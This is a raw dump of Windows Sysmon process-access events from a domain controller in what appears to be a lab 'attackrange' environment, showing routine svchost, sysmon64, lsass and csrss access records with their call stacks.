13:58:17.289{59A5CD1D-8E46-6005-0C00-00000000A301}5964596C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010067Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.289{59A5CD1D-8E46-6005-0C00-00000000A301}5963772C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010066Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.289{59A5CD1D-8E46-6005-0C00-00000000A301}5963772C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010065Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.289{59A5CD1D-8E46-6005-0C00-00000000A301}5963772C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1200-00000000A301}1212C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010064Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.289{59A5CD1D-8E46-6005-0C00-00000000A301}5964596C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010063Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.289{59A5CD1D-8E46-6005-0C00-00000000A301}5963772C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010062Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.289{59A5CD1D-8E46-6005-0C00-00000000A301}5963772C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010061Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.289{59A5CD1D-8E46-6005-0C00-00000000A301}5963772C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010060Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.289{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010059Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.289{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010058Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.289{59A5CD1D-8E46-6005-0C00-00000000A301}5963772C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010057Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.289{59A5CD1D-8E46-6005-0C00-00000000A301}5963772C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010056Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.289{59A5CD1D-8E46-6005-0C00-00000000A301}5963772C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010055Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.289{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010054Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.289{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010053Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.289{59A5CD1D-93F6-6005-E604-00000000A301}48883504C:\Windows\system32\csrss.exe{59A5CD1D-93F9-6005-EE04-00000000A301}4120C:\Windows\system32\efsui.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000010052Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.289{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010051Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.289{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010050Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.289{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010049Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.289{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010048Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.289{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010047Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.289{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010046Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.289{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010045Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.289{59A5CD1D-8E46-6005-0C00-00000000A301}5963772C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010044Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.289{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+773d|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010043Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 